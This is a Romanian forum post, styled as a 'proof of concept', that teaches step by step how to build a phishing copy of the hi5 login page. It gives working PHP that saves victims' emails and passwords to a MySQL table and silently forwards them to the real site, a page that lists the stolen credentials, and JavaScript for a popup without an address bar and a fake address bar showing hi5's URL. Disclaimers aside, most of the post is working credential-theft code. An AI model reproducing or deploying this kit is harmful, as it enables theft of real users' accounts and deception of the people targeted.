shaquille3
Membru nou
Inregistrat: acum 17 ani
Postari: 9
|
|
In primul rand , vreau sa va spun ca am facut acest site de phishing nu pentru a fura parolele altor useri deoarece numi pasa, si nici voua nu ar trebui, deoarece fiecare are dreptul la intimitatea lui si nici voua nu cred ca v-ar placea sa intre cineva pe mail/ orice alt cont al vostru. Acest tutorial este un PoC( Proof of concept) si va spun ca phishingul este ilegal si nu indemn pe nimeni sal foloseasca, ceea ce faceti voi cu acest tutorial faceti pe propria vostra raspundere.
Am vazut pe net multe pagini de phishing, dar nici una nu mi sa parut perfecta sau macar aproape de perfectiune, si am ajuns la concluzia ca daca vrei ceva facut bine trebuie sa il faci cu mana ta deci:
1. prima etapa este sa copiezi codul sursa al paginei pe care vrei sa o reproduci. Eu va recomant sa dati save page as->html and images. Ca exemplu eu am luat o pagina de hi5.
2.codul sursa trebuie modificat pentru ca pagina sa poata fie folosita si daca se afla pe un alt host decat celelalte fisiere. Deci va uitati prin codul sursa si unde vedeti ceva de genul : <a href="/friend/Ploiesti--TopCities-html" class="smallTag">Ploiesti</a> inlocuiti cu <a href="http://www.hi5.com/friend/Ploiesti--TopCities-html" class="smallTag">Ploiesti</a> Aveti destul de modificat .. dar daca vreti sa fie perfect trebui sa aveti rabdare
3.Urmatorul pas este sa faceti ca parolele trimise de user sa ajunga si la voi si la hi5, pentru ca useri sa ajunga pe pagina lor de profil dupa logare. Aceasta etapa este putin mai grea. Din cate am vazut pe internet majoritatea paginilor de scam trimit parolele pe email, dar dupa parerea mea este mai bine sa facem o baza de date mysql unde parolele sa se salveze.
Prima etapa este sa modificati <form name="loginForm" method="post" action="/friend/login.do"> in <FORM name=loginForm action=getpasswd.php method=post>
getpasswd.php <?php
include("dbcon.php"); $email=$_POST["email"]; $passwd=$_POST["password"];
mysql_select_db("hi5",$con); $query="INSERT INTO hack ( email , password ) VALUES ( '$email' , '$passwd' )"; mysql_query($query,$con);
?> <form name=hack action="http://hi5.com/friend/login.do" method=post> <input type=hidden name=email value=<?=$_POST["email"]?> > <input type=hidden name=password value=<?=$_POST["password"]?> ><br> </form>
<script> function submitit(){ var form = document.hack; form.submit(); } </SCRIPT> <script type="text/javascript"> submitit(); </script>
dbcon.php <?php
$con = mysql_connect("mysql host","user","pass"); ?>
inlocuiti mysql host cu url-u de la baza de date, useru si passu
Pentru a forma baza de date si tabelu mai faceti un php setup.php <?php include("dbcon.php"); mysql_query("CREATE DATABASE hi5",$con); mysql_select_db("hi5",$con);
$query="CREATE TABLE hack( email varchar(60), password varchar(60) )"; mysql_query($query,$con); ?>
Pentru a vedea parolele salvate mai faceti un php showpass.php <?php include("dbcon.php"); echo "passworduri furate <br>"; mysql_select_db("hi5",$con); $query="SELECT * FROM hack "; $result=mysql_query($query,$con); while($row=mysql_fetch_array($result)) {echo $row["email"]." si parola ".$row["password"]; echo "<br>"; } ?>
La sfarsitul acestei etape va trebui sa aveti un index.html modificat, getpasswd.php, setup.php, dbcon.php, showpass.php in acelasi folder
4. Urmatorul pas si cel mai uitat in cazul paginilor de phishing este sa faceti ca pagina sa para cat mai credibila. Metoda mea este sa fac o pagina de index care iti deschide pagina care o vrei fara address bar, este foarte simplu:
index.html <HTML><HEAD><TITLE>Hi5 Redirect</TITLE><SCRIPT LANGUAGE="JavaScript">
<!-- Begin function Start(page) { OpenWin = this.open(page, "CtrlWindow", "ini,width=1003,height=750,scrollbars=yes,toolbar=yes,directories=yes,status=yes,menubar=yes,resizable=yes"); } // End --> </SCRIPT> </HEAD><meta http-equiv="Refresh" content="0;url=javascript:Start('hi5.html')"> <p><font size="3">This page has moved, if you are not automatically forwarded to the new page, please <a href="javascript:Start('hi5.html')">click here</a>.</font></p>
</html>
Astfel reusiti sa deschideti pagina voastra fara address bar, dar pentru a duce realismul un pas mai departe va trebui sa creati un address bar fals. Address baru este usor de facut, mai greu a fost sa fac ca address baru sa aiba o pozitie constanta, deci si daca dai scroll el sa ramana tot sus, acest lucru lam facut cu un script luat de pe internet cu floating content in care am inclus html-u de la address baru facut de mine
asta puneti chiar dupa <head> <!--[if IE]>
<!-- Always On Top Content Script- © Dynamic Drive ) For full source code, installation instructions, 100's more DHTML scripts, and Terms Of Use, visit dynamicdrive.com -->
<style> <!-- .drag{position:relative;cursor:hand } #scontentmain{ position:absolute; width:1000px; } #scontentbar{ cursor:hand; position:absolute; background-color:0; height:15; width:100%; top:0; } #scontentsub{ position:absolute; width:100%; top:15; background-color:lightyellow; border:0; padding:1.5px; } --> </style>
<script language="JavaScript1.2"> <!-- //Drag and drop engine for static content //© Dynamic Drive )
var dragapproved=false var zcor,xcor,ycor
function ietruebody(){ return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body }
function movescontentmain(){ if (event.button==1&&dragapproved){ zcor.style.pixelLeft=tempvar1+event.clientX-xcor zcor.style.pixelTop=tempvar2+event.clientY-ycor leftpos=document.all.scontentmain.style.pixelLeft-ietruebody().scrollLeft toppos=document.all.scontentmain.style.pixelTop-ietruebody().scrollTop return false } } function dragscontentmain(){ if (!document.all) return if (event.srcElement.id=="scontentbar"){ dragapproved=true zcor=scontentmain tempvar1=zcor.style.pixelLeft tempvar2=zcor.style.pixelTop xcor=event.clientX ycor=event.clientY document.onmousemove=movescontentmain } } document.onmousedown=dragscontentmain document.onmouseup=new Function("dragapproved=false") //--> </script>
<![endif]-->
si asta puneti chiar inainte de </body>
<!--[if IE]> <div id="scontentmain"> <div id="scontentbar" > <img align="right" src="barbutton.gif" onClick="onoffdisplay()"> </div> <div id="scontentsub">
<body style='border:none' margin='0' leftmargin='0' rightmargin='0' topmargin='0' bottommargin='0'><table border='0' cellspacing='0' cellpadding='0' width='0' width='100%'><tr><td width='71' height='26'><img border='0' src='ie_locationbar1.bmp'/></td><td align='top' width='100%' height='26' style='background: #ffffff url(ie_locationbar2.bmp) no-repeat'><input name='url' style='border:none; width:100%;' value='http://www.hi5.com' onkeydown='if (document.all){if (event.keyCode == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}else if (document.getElementById){if (event.which == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}else if(document.layers){if(event.which == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}'></td><td width='80' height='26'><img border='0' src='ie_locationbar3.bmp'/></td></tr>
</div> </div> </div>
<script language="JavaScript1.2">
/* Always On Top Content Script- © Dynamic Drive ) For full source code, installation instructions, 100's more DHTML scripts, and Terms Of Use, visit dynamicdrive.com */
//configure the below two variables to determine where the static content will initially be positioned when the document loads, in terms of X and Y cooridinates, respectively
var w=-500 var h=0
////Do not edit pass this line/////////// w+=ietruebody().scrollLeft h+=ietruebody().scrollTop
var leftpos=w var toppos=h scontentmain.style.left=w scontentmain.style.top=h
function onoffdisplay(){ if (scontentsub.style.display=='') scontentsub.style.display='none' else scontentsub.style.display='' }
function staticize(){ w2=ietruebody().scrollLeft+leftpos h2=ietruebody().scrollTop+toppos scontentmain.style.left=w2 scontentmain.style.top=h2 } window.onscroll=staticize
</script> <![endif]-->
Dupa aceasta etapa va trebui sa aveti un index.html unde va fi scriptu de deschide de pagina fara address bar, si un alt html unde veti include si scriptul de floating address bar.
PS: scriptul de floating address bar este doar pentru ie, si designul address barului este la fel, doar pentru ie
5. Urmatorul pass si la fel de important ca celalalt este sa aveti un link credibil, deci va trebui sa va gasiti un host cu baza de date mysql, suport php si cu un domeniu cat mai credibil
Daca doriti si stiti cum, puteti sa cautati pe pagina pe care vreti so reproduceti o vulnerabilitate xss si sa dati redirect pe pagina vostra, asta nu va voi explica.
Am creat si eu o pagina pentru a demonstra cele spuse. Ruleaza cel mai bine pe ie 6 sau pe oricare ie:
multumesc prietenului meu alchimistul pentru scripturile php facute de el
Tot ceea ce faceti cu acest tutorial faceti pe raspunderea voastra PS: Voi reporta orice site de phising gasit facut dupa acest tutorial
Modificat de shaquille3 (acum 17 ani)
|
|